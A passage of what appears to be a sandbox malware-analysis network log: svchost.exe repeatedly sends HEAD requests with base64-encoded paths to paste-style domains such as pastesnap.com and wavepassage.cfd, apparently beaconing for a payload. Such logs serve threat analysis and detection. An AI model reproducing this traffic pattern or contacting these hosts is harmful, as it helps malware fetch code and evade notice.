                                                              Jan 12, 2025 09:26:55.687144041 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:55 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B7M5%2FovZM2fe3wAfE0lCwMAQ0xF3%2BOdY%2FMgnMqqUnqre2l2HR4zjA%2FEtKypFqRjNRqO2vwhd%2FjXLcPp63xWBXxCzO4SzfP6SOoCk5m3PpQe0rXm0B87QqximPMypi5n2Wq0d"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b1bade4406-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1565&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              39 | 192.168.2.7 | 50034 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:55.563457966 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.016355038 CET | 874 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:55 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ISaihxj87m9EHy5BNH%2BStLP%2Bd8t0Tf6dSzAMxYitmtFaks%2Bt8JbxY1petxjSPJRpfsgYJxOqSFJf8Sx36c7f6L8PJ8ovIk9KoeTfC3arnQJ6Q%2FWODmJIJSn7FP4MLp3Pmmg%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b3ce85c440-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1458&min_rtt=1458&rtt_var=729&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              40 | 192.168.2.7 | 50036 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:55.746520042 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.193901062 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:56 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:56 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rXtW0x9Ofw%2F7xpZOdYe2QvVWDcUGRhGBsx2b3yyDOMyzMw71UJGy4EHkYuXCFNJ2Qi15y%2ByBtdhXxEiGFoW8CgxbNE1U23xH4Blx3cxk355%2Bm3Jl%2ByLUpD7XDdaSCe4VZP4o"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b4e9b442e9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1669&rtt_var=834&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              41 | 192.168.2.7 | 50043 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:56.022967100 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.491660118 CET | 861 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:56 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:56 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JW7s%2FaOdHNzUURhCC%2BBYTEgHMueMD2CTRDSqYNaV4liW7ZT1AqJTlXNYcoNTdgcUVUqQ8cIiCC0DX0HGD9aACVeAmchrE3wlgOv4l%2FLEMViFzbrhR5IUdYWE3NgCistH"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b6bf1a726b-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=2000&rtt_var=1000&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              42 | 192.168.2.7 | 50048 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:56.498018980 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:56.966150999 CET | 879 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:56 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:56 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nfSs%2BvUPrK%2FTmpCh9acB938Qze1%2FVMWkteUeQa31tW9pRWrNd4TcKZ3yizWA6quXisBG4%2BjkbKWcGWmPZgXEfhmXKoqqYStfU%2FHo33MuR3BFlXnTUEj%2Bo5WT%2BUHrVTnQoD5U"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3b9b9464315-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1524&min_rtt=1524&rtt_var=762&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              43 | 192.168.2.7 | 50052 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:56.679006100 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:57.133270979 CET | 877 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:57 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yB8JJctSwgKgmm5kgki6Dz16dR%2F7%2BcZPPk3DtY7qrE7qJwei7E%2BXOIhcTAeCmu4Xwxa1DN5s168n28UjPkqtaQF5pHWlCscQtYKCumME%2F84%2Fz4iZZFpiQIHIHrnY329lXEI%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3bac89441ec-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2324&min_rtt=2324&rtt_var=1162&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              44 | 192.168.2.7 | 50057 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:56.972333908 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:57.439148903 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:57 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpm%2FapxmbUej7bVX0g6nn8fHrUYUpaJv6N0i9K1ufoIpj12M40c3yUvluNMVhftwk0aXY777udcKM3CDslaK3xoFg%2B9C4ri2SLkDK8tIgB4tw6LG4ADgfHhhIsQEP%2BLZqyri"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3bcaf097c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1989&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              45 | 192.168.2.7 | 50059 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:57.139667988 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:57.609009981 CET | 866 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:57 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:57 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qv%2B0AK6cgna6b6LpUNsBCpt97rfJD%2FrThWZQd73kdtgqSeGc0nWxvkQiew5irJI%2BCji7aR%2BfrSojcHFFSZVd6lGTY2rX7DTp17z%2BOEgl%2FCugd2GWxKGaQeaV4Z4AGFka"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3bdbe837d11-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              46 | 192.168.2.7 | 50069 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:57.615297079 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.068639040 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h0hnTIntVDP0l2NRsZoEZfEY8wpnyiGEjPo%2B9BJympXfxz6F5Zvrlaxd3ANdij8JzHTOgX%2FmrJMUyXb%2FXhMcEDud9D8qfZcwlRH7u%2FvnT90KiSmgyvSPMZHFNAV6o7jJCYeq"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c09a03c3f5-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1659&rtt_var=829&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              47 | 192.168.2.7 | 50071 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:57.920340061 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.381714106 CET | 868 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNe%2BxjU56MTnxuQSOLNFnxiWgGlLWLLiw00MBbbxV2JukvnsS75FeNhX02nYHMBq6d1r96lzLElq9STKYjyjgq1rtCmLSDNwg5epMvXYESXBNbz7HfKolmKckpS430YDJis%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c28ac94229-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              48 | 192.168.2.7 | 50073 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:58.076105118 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.533907890 CET | 876 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tC43tUVnvu0MlM3dBosr5Ck5YKmHhWcLMp362kQoW2P%2BHT5A%2F9U5wty435lN7Cpd7Eu2RiTAm4OasvNdCJSEUnyyN5avqrvPbzrkLix%2BqiyPAzDYd47h5k2IlIZ61REmsw2r"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c38aee7c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2009&min_rtt=2009&rtt_var=1004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              49 | 192.168.2.7 | 50080 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:58.405452013 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:58.857256889 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:58 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:58 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aJjrAcQZCVbjlaYWUHjCyz62WKxp6Nii8YuBXi%2B79y2W%2BvR26ujjnpcdeZjcQDR3uPfV67xUE0at5L1Xss7TegfJDKjPLhtzJbhYdUlkYPSKGMdSk%2FZx%2FBu80POgRPv5"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c5898142b9-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              50 | 192.168.2.7 | 50085 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:58.970473051 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:26:59.420799017 CET | 873 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:59 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLc4OQ80F1aYV01U8TNSa43wwBwfojeYNQbhSmVXVXrachEiPux2X%2BdOQPGL4TR1Vk5gE%2FBYZsddGTDscF0QjnIVkawUbblqNWMoIvkEpFz%2BheHoSuflnHrjiubf364GXr%2BF"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3c90baa0f46-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1470&rtt_var=735&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              51 | 192.168.2.7 | 50087 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:59.173010111 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:26:59.693499088 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:59 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BILufdCondTbCmU%2Bv%2BWI4N%2BPDC09lnQovWxA2ofywYX3WqUtWRZGyPNRc1h25zKrPPJYP1hLxsinlsukBeKcB3X4zYpAIaM0WuVcS60msTWcma1ebXw5XAmB3R6Q5BYFxLU%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3cabb49c466-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11314&min_rtt=11314&rtt_var=5657&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=86&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              52 | 192.168.2.7 | 50094 | 104.21.64.1 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:59.431917906 CET | 91 | OUT | HEAD /STB/c2VjdXJldGV4dHdlYg==M.txt HTTP/1.1
                                                              Host: securetextweb.cc
                                                              Connection: close
                                                              Jan 12, 2025 09:26:59.960928917 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:26:59 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:26:59 GMT
                                                              Location: https://securetextweb.cc/STB/c2VjdXJldGV4dHdlYg==M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZVNE8vpAsm4%2FQLxwwJRjreU51qfTLD%2F0XkikoSkuhTWoHqbZYtSJBpoQt8s189NglTyHLIFdKpwnWeMsQcc3mnMHc2TVgUfJBrvXatYcEsBD3srh15msKGdPQ9s0LuEAA%2Fqg"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3cc48907c6a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1932&min_rtt=1932&rtt_var=966&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=91&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              53 | 192.168.2.7 | 50096 | 172.67.198.113 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:26:59.699696064 CET | 80 | OUT | HEAD /STB/cGFzdGVzbmFwM.txt HTTP/1.1
                                                              Host: pastesnap.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:00.189785004 CET | 862 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:00 GMT
                                                              Location: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Du2Q%2FFVh7XrNmTntxhe7LEgqL5dXAaI1V1jHKpyO0lRNab9Ca2U%2BFIVs6akBLe35bSJbGOvofC1OXiC13GXecOUObcCq8rokNUf%2FyBtA0FTeIlz3rCB0urd%2BPypiXJZU"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3cddcd443b6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1922&min_rtt=1922&rtt_var=961&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=80&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              54 | 192.168.2.7 | 50106 | 172.67.176.186 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:00.195873022 CET | 87 | OUT | HEAD /STB/dGV4dGJpbnZhdWx0M.txt HTTP/1.1
                                                              Host: textbinvault.com
                                                              Connection: close
                                                              Jan 12, 2025 09:27:00.669436932 CET | 875 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:00 GMT
                                                              Location: https://textbinvault.com/STB/dGV4dGJpbnZhdWx0M.txt
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Za0HjlXFAlYaLiqwlGyHuXr4R3xJfAu8CINdvlvCll8eOzYmY1%2FpafB789Urpa77jaCDkYeIYbH4P0Ad0bAiFWiu%2FSEs3uU9hQetMU6d8yUi4UrryaJP65xoVIAhCLT%2BYS%2F%2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 900bc3d0db9942ca-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=87&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              55 | 192.168.2.7 | 50108 | 188.114.97.3 | 80 | 7628 | C:\Windows\System32\svchost.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Jan 12, 2025 09:27:00.432697058 CET | 86 | OUT | HEAD /STB/d2F2ZXBhc3NhZ2U=M.txt HTTP/1.1
                                                              Host: wavepassage.cfd
                                                              Connection: close
                                                              Jan 12, 2025 09:27:00.891446114 CET | 871 | IN | HTTP/1.1 301 Moved Permanently
                                                              Date: Sun, 12 Jan 2025 08:27:00 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Sun, 12 Jan 2025 09:27:00 GMT
                                                              Location: https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txt
